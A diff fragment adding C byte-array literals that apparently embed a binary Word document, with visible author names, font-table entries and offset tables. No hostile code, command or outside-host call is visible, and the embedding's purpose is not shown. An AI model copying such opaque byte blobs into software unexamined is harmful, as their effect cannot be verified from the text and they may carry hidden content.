+"\x00\x00\x00\x00\x23\x00\x00\x00\x00\x00\x23\x00\x00\x00\x00\x00"
+"\x23\x00\x00\x00\x00\x00\x23\x00\x00\x00\x00\x00\x23\x00\x00\x00"
+"\x00\x00\x23\x00\x00\x00\x00\x00\x23\x00\x00\x00\x00\x00\x23\x00"
+"\x00\x00\x00\x00\x23\x00\x00\x00\x00\x00\x23\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x54\x50\x00\x00\x5a\x50\x00\x00\xc3\x50\x00\x00"
+"\xc8\x50\x00\x00\xfd\x50\x00\x00\x05\x51\x00\x00\x55\x51\x00\x00"
+"\x5c\x51\x00\x00\xcd\x67\x00\x00\xd7\x67\x00\x00\x00\x68\x00\x00"
+"\x0c\x68\x00\x00\x1e\x68\x00\x00\x24\x68\x00\x00\x57\x68\x00\x00"
+"\x5e\x68\x00\x00\x6e\x68\x00\x00\x75\x68\x00\x00\x92\x68\x00\x00"
+"\x99\x68\x00\x00\xc3\x68\x00\x00\xd0\x68\x00\x00\xdd\x68\x00\x00"
+"\xe5\x68\x00\x00\x3c\x69\x00\x00\x45\x69\x00\x00\x8c\x69\x00\x00"
+"\x95\x69\x00\x00\xda\x69\x00\x00\xe3\x69\x00\x00\x47\x6a\x00\x00"
+"\x4d\x6a\x00\x00\xed\x6a\x00\x00\xf3\x6a\x00\x00\x03\x6b\x00\x00"
+"\x0a\x6b\x00\x00\x29\x6b\x00\x00\x30\x6b\x00\x00\x70\x6b\x00\x00"
+"\x77\x6b\x00\x00\xdc\x6b\x00\x00\xe0\x6b\x00\x00\x6e\x6c\x00\x00"
+"\x78\x6c\x00\x00\x8b\x6c\x00\x00\x91\x6c\x00\x00\xa5\x6c\x00\x00"
+"\xb2\x6c\x00\x00\xd6\x6c\x00\x00\xdd\x6c\x00\x00\xe0\x6c\x00\x00"
+"\xe6\x6c\x00\x00\x42\x6d\x00\x00\x4b\x6d\x00\x00\x4c\x6d\x00\x00"
+"\x53\x6d\x00\x00\x65\x6d\x00\x00\x6a\x6d\x00\x00\xac\x6d\x00\x00"
+"\xba\x6d\x00\x00\xf5\x6d\x00\x00\xf8\x6d\x00\x00\x28\x6e\x00\x00"
+"\x31\x6e\x00\x00\x43\x6e\x00\x00\x47\x6e\x00\x00\xb8\x6e\x00\x00"
+"\xc3\x6e\x00\x00\xfb\x6e\x00\x00\x02\x6f\x00\x00\x0e\x6f\x00\x00"
+"\x14\x6f\x00\x00\x2e\x6f\x00\x00\x3b\x6f\x00\x00\x74\x71\x00\x00"
+"\x7a\x71\x00\x00\x7d\x71\x00\x00\x84\x71\x00\x00\xdf\x73\x00\x00"
+"\x18\x74\x00\x00\x1b\x74\x00\x00\x07\x00\x1c\x00\x07\x00\x1c\x00"
+"\x07\x00\x1c\x00\x07\x00\x1c\x00\x07\x00\x1c\x00\x07\x00\x1c\x00"
+"\x07\x00\x1c\x00\x07\x00\x1c\x00\x07\x00\x1c\x00\x07\x00\x1c\x00"
+"\x07\x00\x1c\x00\x07\x00\x1c\x00\x07\x00\x1c\x00\x07\x00\x1c\x00"
+"\x07\x00\x1c\x00\x07\x00\x1c\x00\x07\x00\x1c\x00\x07\x00\x1c\x00"
+"\x07\x00\x1c\x00\x07\x00\x1c\x00\x07\x00\x1c\x00\x07\x00\x1c\x00"
+"\x07\x00\x1c\x00\x07\x00\x1c\x00\x07\x00\x1c\x00\x07\x00\x1c\x00"
+"\x07\x00\x1c\x00\x07\x00\x1c\x00\x07\x00\x1c\x00\x07\x00\x1c\x00"
+"\x07\x00\x1c\x00\x07\x00\x1c\x00\x07\x00\x1c\x00\x07\x00\x1c\x00"
+"\x07\x00\x1c\x00\x07\x00\x1c\x00\x07\x00\x1c\x00\x07\x00\x1c\x00"
+"\x07\x00\x04\x00\x07\x00\x07\x00\x02\x00\x00\x00\x00\x00\x80\x01"
+"\x00\x00\x83\x01\x00\x00\xda\x06\x00\x00\xdb\x06\x00\x00\xa2\x0d"
+"\x00\x00\xa4\x0d\x00\x00\x8e\x1b\x00\x00\x95\x1b\x00\x00\x1d\x25"
+"\x00\x00\x1f\x25\x00\x00\xf8\x2e\x00\x00\x1c\x2f\x00\x00\x58\x3c"
+"\x00\x00\x60\x3c\x00\x00\x10\x48\x00\x00\x19\x48\x00\x00\xdf\x73"
+"\x00\x00\x18\x74\x00\x00\x1b\x74\x00\x00\x07\x00\x33\x00\x07\x00"
+"\x33\x00\x07\x00\x33\x00\x07\x00\x33\x00\x07\x00\x33\x00\x07\x00"
+"\x33\x00\x07\x00\x33\x00\x07\x00\x33\x00\x07\x00\x07\x00\x02\x00"
+"\x00\x00\x00\x00\x1b\x4f\x00\x00\x32\x4f\x00\x00\x10\x50\x00\x00"
+"\x40\x50\x00\x00\x42\x50\x00\x00\x43\x50\x00\x00\xca\x50\x00\x00"
+"\xdd\x50\x00\x00\x42\x5d\x00\x00\x6f\x5d\x00\x00\x7b\x5e\x00\x00"
+"\x86\x5e\x00\x00\xa3\x5f\x00\x00\xb0\x5f\x00\x00\x81\x60\x00\x00"
+"\x8b\x60\x00\x00\xd4\x60\x00\x00\x07\x61\x00\x00\xa7\x67\x00\x00"
+"\x34\x68\x00\x00\x54\x68\x00\x00\x6e\x68\x00\x00\xa3\x68\x00\x00"
+"\xf3\x69\x00\x00\x13\x6a\x00\x00\x22\x6a\x00\x00\x44\x6a\x00\x00"
+"\x5d\x6a\x00\x00\x75\x6a\x00\x00\x6e\x6c\x00\x00\x7a\x6c\x00\x00"
+"\x7f\x6c\x00\x00\xf3\x6c\x00\x00\x77\x6e\x00\x00\x7f\x6e\x00\x00"
+"\x3e\x6f\x00\x00\xdf\x73\x00\x00\xf5\x73\x00\x00\xff\x73\x00\x00"
+"\x06\x74\x00\x00\x18\x74\x00\x00\x1b\x74\x00\x00\x07\x00\x05\x00"
+"\x07\x00\x05\x00\x07\x00\x05\x00\x07\x00\x05\x00\x07\x00\x05\x00"
+"\x07\x00\x05\x00\x07\x00\x05\x00\x07\x00\x05\x00\x07\x00\x05\x00"
+"\x07\x00\x05\x00\x07\x00\x05\x00\x07\x00\x05\x00\x07\x00\x05\x00"
+"\x07\x00\x05\x00\x07\x00\x05\x00\x07\x00\x05\x00\x07\x00\x05\x00"
+"\x07\x00\x05\x00\x07\x00\x05\x00\x07\x00\x05\x00\x07\x00\x02\x00"
+"\x00\x00\x00\x00\x7d\x71\x00\x00\x84\x71\x00\x00\xdf\x73\x00\x00"
+"\x18\x74\x00\x00\x1b\x74\x00\x00\x07\x00\x04\x00\x07\x00\x07\x00"
+"\x02\x00\xff\xff\x14\x00\x00\x00\x08\x00\x50\x00\x61\x00\x74\x00"
+"\x72\x00\x69\x00\x63\x00\x69\x00\x61\x00\x00\x00\x08\x00\x50\x00"
+"\x61\x00\x74\x00\x72\x00\x69\x00\x63\x00\x69\x00\x61\x00\x00\x00"
+"\x08\x00\x50\x00\x61\x00\x74\x00\x72\x00\x69\x00\x63\x00\x69\x00"
+"\x61\x00\x00\x00\x08\x00\x50\x00\x61\x00\x74\x00\x72\x00\x69\x00"
+"\x63\x00\x69\x00\x61\x00\x00\x00\x0f\x00\x50\x00\x61\x00\x74\x00"
+"\x72\x00\x69\x00\x63\x00\x69\x00\x61\x00\x20\x00\x4d\x00\x4f\x00"
+"\x4e\x00\x49\x00\x4f\x00\x54\x00\x00\x00\x0f\x00\x50\x00\x61\x00"
+"\x74\x00\x72\x00\x69\x00\x63\x00\x69\x00\x61\x00\x20\x00\x4d\x00"
+"\x4f\x00\x4e\x00\x49\x00\x4f\x00\x54\x00\x00\x00\x0f\x00\x50\x00"
+"\x61\x00\x74\x00\x72\x00\x69\x00\x63\x00\x69\x00\x61\x00\x20\x00"
+"\x4d\x00\x4f\x00\x4e\x00\x49\x00\x4f\x00\x54\x00\x00\x00\x0f\x00"
+"\x50\x00\x61\x00\x74\x00\x72\x00\x69\x00\x63\x00\x69\x00\x61\x00"
+"\x20\x00\x4d\x00\x4f\x00\x4e\x00\x49\x00\x4f\x00\x54\x00\x00\x00"
+"\x06\x00\x4d\x00\x6f\x00\x6e\x00\x69\x00\x6f\x00\x74\x00\x00\x00"
+"\x03\x00\x50\x00\x61\x00\x74\x00\x00\x00\x01\x00\xc9\x6e\x24\x4f"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x02\x00\x02\x00\x0a\x00"
+"\x00\x00\x04\x00\x00\x00\x08\x00\x00\x00\xe5\x00\x00\x00\x00\x00"
+"\x00\x00\x09\x00\x00\x00\x55\x3b\x1b\x00\x1e\x3b\x1d\x00\x02\x75"
+"\x3b\x00\x45\x6d\x47\x00\xae\x0f\x6a\x00\xa5\x49\x73\x00\x2e\x20"
+"\xb9\x00\x52\x59\xd7\x00\x3e\x75\xec\x00\x25\x31\xed\x00\x00\x00"
+"\x00\x00\x15\x27\x00\x00\x90\x28\x00\x00\xef\x44\x00\x00\xde\x50"
+"\x00\x00\x4e\x5b\x00\x00\x4f\x5b\x00\x00\x45\x5c\x00\x00\x46\x5c"
+"\x00\x00\xf1\x5e\x00\x00\xfc\x5e\x00\x00\x36\x62\x00\x00\x41\x62"
+"\x00\x00\x2d\x66\x00\x00\x15\x67\x00\x00\xa6\x67\x00\x00\xa7\x67"
+"\x00\x00\xaa\x67\x00\x00\xb1\x67\x00\x00\xbe\x67\x00\x00\xcd\x67"
+"\x00\x00\xd8\x67\x00\x00\xdc\x67\x00\x00\xdd\x67\x00\x00\xe0\x67"
+"\x00\x00\xe5\x67\x00\x00\xf1\x67\x00\x00\x00\x68\x00\x00\x0d\x68"
+"\x00\x00\x11\x68\x00\x00\x12\x68\x00\x00\x15\x68\x00\x00\x1a\x68"
+"\x00\x00\x25\x68\x00\x00\x34\x68\x00\x00\x3e\x68\x00\x00\x48\x68"
+"\x00\x00\x49\x68\x00\x00\x4c\x68\x00\x00\x54\x68\x00\x00\x5f\x68"
+"\x00\x00\x6e\x68\x00\x00\x81\x68\x00\x00\x85\x68\x00\x00\x86\x68"
+"\x00\x00\x89\x68\x00\x00\x8e\x68\x00\x00\xa2\x68\x00\x00\xb1\x68"
+"\x00\x00\xc3\x68\x00\x00\xd1\x68\x00\x00\xd2\x68\x00\x00\xd5\x68"
+"\x00\x00\xd9\x68\x00\x00\xe6\x68\x00\x00\xf5\x68\x00\x00\xfd\x68"
+"\x00\x00\x01\x69\x00\x00\x02\x69\x00\x00\x05\x69\x00\x00\x0a\x69"
+"\x00\x00\x13\x69\x00\x00\x22\x69\x00\x00\x2c\x69\x00\x00\x30\x69"
+"\x00\x00\x31\x69\x00\x00\x34\x69\x00\x00\x39\x69\x00\x00\x46\x69"
+"\x00\x00\x55\x69\x00\x00\x5b\x69\x00\x00\x5f\x69\x00\x00\x60\x69"
+"\x00\x00\x63\x69\x00\x00\x68\x69\x00\x00\x75\x69\x00\x00\x84\x69"
+"\x00\x00\x8c\x69\x00\x00\x9a\x69\x00\x00\x9b\x69\x00\x00\x9e\x69"
+"\x00\x00\xa3\x69\x00\x00\xb0\x69\x00\x00\xbf\x69\x00\x00\xc6\x69"
+"\x00\x00\xce\x69\x00\x00\xcf\x69\x00\x00\xd2\x69\x00\x00\xd7\x69"
+"\x00\x00\xe4\x69\x00\x00\xf3\x69\x00\x00\xfb\x69\x00\x00\xff\x69"
+"\x00\x00\x00\x6a\x00\x00\x03\x6a\x00\x00\x07\x6a\x00\x00\x13\x6a"
+"\x00\x00\x22\x6a\x00\x00\x33\x6a\x00\x00\x3b\x6a\x00\x00\x3c\x6a"
+"\x00\x00\x3f\x6a\x00\x00\x44\x6a\x00\x00\x4e\x6a\x00\x00\x5d\x6a"
+"\x00\x00\x67\x6a\x00\x00\x6b\x6a\x00\x00\x6c\x6a\x00\x00\x6f\x6a"
+"\x00\x00\x75\x6a\x00\x00\x80\x6a\x00\x00\x8f\x6a\x00\x00\x96\x6a"
+"\x00\x00\x9e\x6a\x00\x00\x9f\x6a\x00\x00\xa2\x6a\x00\x00\xa8\x6a"
+"\x00\x00\xb6\x6a\x00\x00\xc5\x6a\x00\x00\xd4\x6a\x00\x00\xe1\x6a"
+"\x00\x00\xe2\x6a\x00\x00\xe5\x6a\x00\x00\xea\x6a\x00\x00\xf4\x6a"
+"\x00\x00\x03\x6b\x00\x00\x14\x6b\x00\x00\x1c\x6b\x00\x00\x1d\x6b"
+"\x00\x00\x20\x6b\x00\x00\x25\x6b\x00\x00\x31\x6b\x00\x00\x40\x6b"
+"\x00\x00\x48\x6b\x00\x00\x4c\x6b\x00\x00\x4d\x6b\x00\x00\x50\x6b"
+"\x00\x00\x55\x6b\x00\x00\x61\x6b\x00\x00\x70\x6b\x00\x00\x78\x6b"
+"\x00\x00\x7c\x6b\x00\x00\x7d\x6b\x00\x00\x80\x6b\x00\x00\x85\x6b"
+"\x00\x00\x90\x6b\x00\x00\x9f\x6b\x00\x00\xa5\x6b\x00\x00\xa9\x6b"
+"\x00\x00\xaa\x6b\x00\x00\xad\x6b\x00\x00\xb2\x6b\x00\x00\xbe\x6b"
+"\x00\x00\xcd\x6b\x00\x00\xe1\x6b\x00\x00\xe5\x6b\x00\x00\xe6\x6b"
+"\x00\x00\xe9\x6b\x00\x00\xee\x6b\x00\x00\xf8\x6b\x00\x00\x07\x6c"
+"\x00\x00\x11\x6c\x00\x00\x15\x6c\x00\x00\x16\x6c\x00\x00\x19\x6c"
+"\x00\x00\x20\x6c\x00\x00\x31\x6c\x00\x00\x40\x6c\x00\x00\x47\x6c"
+"\x00\x00\x4b\x6c\x00\x00\x4c\x6c\x00\x00\x4f\x6c\x00\x00\x54\x6c"
+"\x00\x00\x66\x6c\x00\x00\x67\x6c\x00\x00\x6e\x6c\x00\x00\x7e\x6c"
+"\x00\x00\x7f\x6c\x00\x00\x82\x6c\x00\x00\x87\x6c\x00\x00\x92\x6c"
+"\x00\x00\xa1\x6c\x00\x00\xa5\x6c\x00\x00\xb3\x6c\x00\x00\xb4\x6c"
+"\x00\x00\xb7\x6c\x00\x00\xbb\x6c\x00\x00\xc7\x6c\x00\x00\xd6\x6c"
+"\x00\x00\xe7\x6c\x00\x00\xef\x6c\x00\x00\xf0\x6c\x00\x00\xf3\x6c"
+"\x00\x00\xf8\x6c\x00\x00\x01\x6d\x00\x00\x10\x6d\x00\x00\x1c\x6d"
+"\x00\x00\x20\x6d\x00\x00\x21\x6d\x00\x00\x24\x6d\x00\x00\x28\x6d"
+"\x00\x00\x33\x6d\x00\x00\x42\x6d\x00\x00\x54\x6d\x00\x00\x58\x6d"
+;
+char file_part8[]=
+"\x00\x00\x59\x6d\x00\x00\x5c\x6d\x00\x00\x62\x6d\x00\x00\x6b\x6d"
+"\x00\x00\x7a\x6d\x00\x00\x82\x6d\x00\x00\x8a\x6d\x00\x00\x8b\x6d"
+"\x00\x00\x8e\x6d\x00\x00\x93\x6d\x00\x00\x9d\x6d\x00\x00\xac\x6d"
+"\x00\x00\xbb\x6d\x2c\x00\xbf\x6d\x00\x00\xc0\x6d\x00\x00\xc3\x6d"
+"\x00\x00\xc7\x6d\x00\x00\xd9\x6d\x00\x00\xe8\x6d\x00\x00\xee\x6d"
+"\x00\x00\xfe\x6d\x00\x00\xff\x6d\x00\x00\x02\x6e\x00\x00\x07\x6e"
+"\x00\x00\x19\x6e\x00\x00\x28\x6e\x00\x00\x32\x6e\x00\x00\x36\x6e"
+"\x00\x00\x37\x6e\x00\x00\x3a\x6e\x00\x00\x3f\x6e\x00\x00\x48\x6e"
+"\x00\x00\x57\x6e\x00\x00\x60\x6e\x00\x00\x64\x6e\x00\x00\x65\x6e"
+"\x00\x00\x68\x6e\x00\x00\x6d\x6e\x00\x00\x79\x6e\x00\x00\x88\x6e"
+"\x00\x00\x90\x6e\x00\x00\x94\x6e\x00\x00\x95\x6e\x00\x00\x98\x6e"
+"\x00\x00\x9e\x6e\x00\x00\xa9\x6e\x00\x00\xb8\x6e\x00\x00\xc4\x6e"
+"\x00\x00\xc9\x6e\x00\x00\xca\x6e\x00\x00\xcd\x6e\x00\x00\xd2\x6e"
+"\x00\x00\xdd\x6e\x00\x00\xec\x6e\x00\x00\xf5\x6e\x00\x00\x03\x6f"
+"\x00\x00\x04\x6f\x00\x00\x07\x6f\x00\x00\x0b\x6f\x00\x00\x15\x6f"
+"\x00\x00\x24\x6f\x00\x00\x2e\x6f\x00\x00\x3c\x6f\x00\x00\x3d\x6f"
+"\x00\x00\xbb\x6f\x00\x00\xb1\x73\x00\x00\x1b\x74\x00\x00\x00\x00"
+"\x00\x00\x35\x00\x00\x00\x01\x00\x00\x00\x35\x00\x00\x00\x21\x86"
+"\x02\x30\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x00"
+"\x00\x00\x02\x01\x00\x00\x02\x01\x00\x00\x02\x01\x00\x00\x02\x01"
+"\x00\x00\x02\x01\x00\x00\x02\x01\x00\x00\x9e\x01\x00\x04\x02\x01"
+"\x00\x00\x02\x01\x00\x00\x02\x01\x00\x00\x02\x01\x00\x00\x02\x01"
+"\x00\x00\x02\x01\x00\x00\x9e\x01\x00\x04\x02\x01\x00\x00\x02\x01"
+"\x00\x00\x02\x01\x00\x00\x02\x01\x00\x00\x02\x01\x00\x00\x02\x01"
+"\x00\x00\x9e\x01\x00\x04\x02\x01\x00\x00\x02\x01\x00\x00\x02\x01"
+"\x00\x00\x02\x01\x00\x00\x02\x01\x00\x00\x02\x01\x00\x00\x9e\x01"
+"\x00\x04\x02\x01\x00\x00\x02\x01\x00\x00\x02\x01\x00\x00\x02\x01"
+"\x00\x00\x02\x01\x00\x00\x02\x01\x00\x00\x9e\x01\x00\x04\x02\x01"
+"\x00\x00\x02\x01\x00\x00\x02\x01\x00\x00\x02\x01\x00\x00\x02\x01"
+"\x00\x00\x02\x01\x00\x00\x9e\x01\x00\x04\x02\x01\x00\x00\x02\x01"
+"\x00\x00\x02\x01\x00\x00\x02\x01\x00\x00\x02\x01\x00\x00\x02\x01"
+"\x00\x00\x9e\x01\x00\x04\x02\x01\x00\x00\x02\x01\x00\x00\x02\x01"
+"\x00\x00\x02\x01\x00\x00\x02\x01\x00\x00\x02\x01\x00\x00\x9e\x01"
+"\x00\x04\x02\x01\x00\x00\x02\x01\x00\x00\x02\x01\x00\x00\x02\x01"
+"\x00\x00\x02\x01\x00\x00\x02\x01\x00\x00\x9e\x01\x00\x04\x02\x01"
+"\x00\x00\x02\x01\x00\x00\x02\x01\x00\x00\x02\x01\x00\x00\x02\x01"
+"\x00\x00\x02\x01\x00\x00\x9e\x01\x00\x04\x02\x01\x00\x00\x02\x01"
+"\x00\x00\x02\x01\x00\x00\x02\x01\x00\x00\x02\x01\x00\x00\x02\x01"
+"\x00\x00\x9e\x01\x00\x04\x02\x01\x00\x00\x02\x01\x00\x00\x02\x01"
+"\x00\x00\x02\x01\x00\x00\x02\x01\x00\x00\x02\x01\x00\x00\x9e\x01"
+"\x00\x04\x02\x01\x00\x00\x02\x01\x00\x00\x02\x01\x00\x00\x02\x01"
+"\x00\x00\x02\x01\x00\x00\x02\x01\x00\x00\x9e\x01\x00\x04\x02\x01"
+"\x00\x00\x02\x01\x00\x00\x02\x01\x00\x00\x02\x01\x00\x00\x02\x01"
+"\x00\x00\x02\x01\x00\x00\x9e\x01\x00\x04\x02\x01\x00\x00\x02\x01"
+"\x00\x00\x02\x01\x00\x00\x02\x01\x00\x00\x02\x01\x00\x00\x02\x01"
+"\x00\x00\x9e\x01\x00\x04\x02\x01\x00\x00\x02\x01\x00\x00\x02\x01"
+"\x00\x00\x02\x01\x00\x00\x02\x01\x00\x00\x02\x01\x00\x00\x9e\x01"
+"\x00\x04\x02\x01\x00\x00\x02\x01\x00\x00\x02\x01\x00\x00\x02\x01"
+"\x00\x00\x02\x01\x00\x00\x02\x01\x00\x00\x9e\x01\x00\x04\x02\x01"
+"\x00\x00\x02\x01\x00\x00\x02\x01\x00\x00\x02\x01\x00\x00\x02\x01"
+"\x00\x00\x02\x01\x00\x00\x9e\x01\x00\x04\x02\x01\x00\x00\x02\x01"
+"\x00\x00\x02\x01\x00\x00\x02\x01\x00\x00\x02\x01\x00\x00\x02\x01"
+"\x00\x00\x9e\x01\x00\x04\x02\x01\x00\x00\x02\x01\x00\x00\x02\x01"
+"\x00\x00\x02\x01\x00\x00\x02\x01\x00\x00\x02\x01\x00\x00\x9e\x01"
+"\x00\x04\x02\x01\x00\x00\x02\x01\x00\x00\x02\x01\x00\x00\x02\x01"
+"\x00\x00\x02\x01\x00\x00\x02\x01\x00\x00\x9e\x01\x00\x04\x02\x01"
+"\x00\x00\x02\x01\x00\x00\x02\x01\x00\x00\x02\x01\x00\x00\x02\x01"
+"\x00\x00\x02\x01\x00\x00\x9e\x01\x00\x04\x02\x01\x00\x00\x02\x01"
+"\x00\x00\x02\x01\x00\x00\x02\x01\x00\x00\x02\x01\x00\x00\x02\x01"
+"\x00\x00\x9e\x01\x00\x04\x02\x01\x00\x00\x02\x01\x00\x00\x02\x01"
+"\x00\x00\x02\x01\x00\x00\x02\x01\x00\x00\x02\x01\x00\x00\x9e\x01"
+"\x00\x04\x02\x01\x00\x00\x02\x01\x00\x00\x02\x01\x00\x00\x02\x01"
+"\x00\x00\x02\x01\x00\x00\x02\x01\x00\x00\x9e\x01\x00\x04\x02\x01"
+"\x00\x00\x02\x01\x00\x00\x02\x01\x00\x00\x02\x01\x00\x00\x02\x01"
+"\x00\x00\x02\x01\x00\x00\x9e\x01\x00\x04\x02\x01\x00\x00\x02\x01"
+"\x00\x00\x02\x01\x00\x00\x02\x01\x00\x00\x02\x01\x00\x00\x02\x01"
+"\x00\x00\x9e\x01\x00\x04\x02\x01\x00\x00\x02\x01\x00\x00\x02\x01"
+"\x00\x00\x02\x01\x00\x00\x02\x01\x00\x00\x02\x01\x00\x00\x9e\x01"
+"\x00\x04\x02\x01\x00\x00\x02\x01\x00\x6e\x02\x01\x00\x00\x02\x01"
+"\x00\x00\x02\x01\x00\x00\x02\x01\x00\x00\x9e\x01\x00\x04\x02\x01"
+"\x00\x00\x02\x01\x00\x00\x02\x01\x00\x00\x02\x01\x00\x00\x02\x01"
+"\x00\x00\x02\x01\x00\x00\x9e\x01\x00\x04\x02\x01\x00\x00\x02\x01"
+"\x00\x00\x02\x01\x00\x00\x02\x01\x00\x00\x02\x01\x00\x00\x02\x01"
+"\x00\x00\x9e\x01\x00\x04\x02\x01\x00\x00\x02\x01\x00\x00\x02\x01"
+"\x00\x00\x02\x01\x00\x00\x02\x01\x00\x00\x02\x01\x00\x00\x9e\x01"
+"\x00\x04\x02\x01\x00\x00\x02\x01\x00\x00\x02\x01\x00\x00\x02\x01"
+"\x00\x00\x02\x01\x00\x00\x02\x01\x00\x00\x9e\x01\x00\x04\x02\x01"
+"\x00\x00\x02\x01\x00\x00\x02\x01\x00\x00\x02\x01\x00\x00\x02\x01"
+"\x00\x00\x02\x01\x00\x00\x9e\x01\x00\x04\x02\x01\x00\x00\x02\x01"
+"\x00\x00\x02\x01\x00\x00\x02\x01\x00\x00\x02\x01\x00\x00\x02\x01"
+"\x00\x00\x9e\x01\x00\x04\x02\x01\x00\x00\x02\x01\x00\x00\x02\x01"
+"\x00\x00\x02\x01\x00\x00\x02\x01\x00\x00\x02\x01\x00\x00\x96\x01"
+"\x00\x04\x21\x86\x02\x30\x00\x00\x00\x00\xff\x40\x01\x80\x01\x00"
+"\x7d\x71\x00\x00\x7d\x71\x00\x00\x18\x30\x22\x02\x01\x00\x01\x00"
+"\x7d\x71\x00\x00\x00\x00\x00\x00\x7d\x71\x00\x00\x00\x00\x00\x00"
+"\x02\x10\x00\x00\x00\x00\x00\x00\x00\x1a\x74\x00\x00\x70\x00\x00"
+"\x10\x00\x40\x00\x00\xff\xff\x01\x00\x00\x00\x07\x00\x55\x00\x6e"
+"\x00\x6b\x00\x6e\x00\x6f\x00\x77\x00\x6e\x00\xff\xff\x01\x00\x08"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\x01\x00\x00"
+"\x00\x00\x00\xff\xff\x00\x00\x02\x00\xff\xff\x00\x00\x00\x00\xff"
+"\xff\x00\x00\x02\x00\xff\xff\x00\x00\x00\x00\x04\x00\x00\x00\x47"
+"\x16\x90\x01\x00\x00\x02\x02\x06\x03\x05\x04\x05\x02\x03\x04\x87"
+"\x7a\x00\x20\x00\x00\x00\x80\x08\x00\x00\x00\x00\x00\x00\x00\xff"
+"\x01\x00\x00\x00\x00\x00\x00\x54\x00\x69\x00\x6d\x00\x65\x00\x73"
+"\x00\x20\x00\x4e\x00\x65\x00\x77\x00\x20\x00\x52\x00\x6f\x00\x6d"
+"\x00\x61\x00\x6e\x00\x00\x00\x35\x16\x90\x01\x02\x00\x05\x05\x01"
+"\x02\x01\x07\x06\x02\x05\x07\x00\x00\x00\x00\x00\x00\x00\x10\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x00\x53"
+"\x00\x79\x00\x6d\x00\x62\x00\x6f\x00\x6c\x00\x00\x00\x33\x26\x90"
+"\x01\x00\x00\x02\x0b\x06\x04\x02\x02\x02\x02\x02\x04\x87\x7a\x00"
+"\x20\x00\x00\x00\x80\x08\x00\x00\x00\x00\x00\x00\x00\xff\x01\x00"
+"\x00\x00\x00\x00\x00\x41\x00\x72\x00\x69\x00\x61\x00\x6c\x00\x00"
+"\x00\x3b\x06\x90\x01\x86\x07\x02\x01\x06\x00\x03\x01\x01\x01\x01"
+"\x01\x03\x00\x00\x00\x00\x00\x0e\x08\x10\x00\x00\x00\x00\x00\x00"
+"\x00\x01\x00\x04\x00\x00\x00\x00\x00\x53\x00\x69\x00\x6d\x00\x53"
+"\x00\x75\x00\x6e\x00\x00\x00\x8b\x5b\x53\x4f\x00\x00\x22\x00\x04"
+"\x00\x71\x08\x88\x18\x00\xf0\xc5\x02\x00\x00\xa9\x01\x00\x00\x00"
+"\x00\x33\x8d\xa1\x46\x21\x95\xa1\x66\x71\x1d\x82\x46\x04\x00\x02"
+"\x00\x00\x00\xd3\x11\x00\x00\x0c\x62\x00\x00\x01\x00\x3b\x00\x00"
+"\x00\x04\x00\x83\x10\xd1\x00\x00\x00\xd3\x11\x00\x00\x0c\x62\x00"
+"\x00\x01\x00\x3b\x00\x00\x00\xd1\x00\x00\x00\x00\x00\x00\x00\x21"
+"\x03\x00\xf0\x10\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xa5\x06\xc0"
+"\x07\xb4\x00\xb4\x00\x80\x00\x32\x34\x00\x00\x10\x00\x19\x00\x64"
+"\x00\x00\x00\x19\x00\x00\x00\xa4\x73\x00\x00\xa4\x73\x00\x00\x00"
+"\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x01\x33\x83\x51\x00\xf0\x10\x04\xdf\xdf\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x48\x00\x00\x00\x00"
+"\x00\x28\xf0\xff\x0f\x01\x00\x01\x3f\x00\x00\xe4\x04\x00\x00\xff"
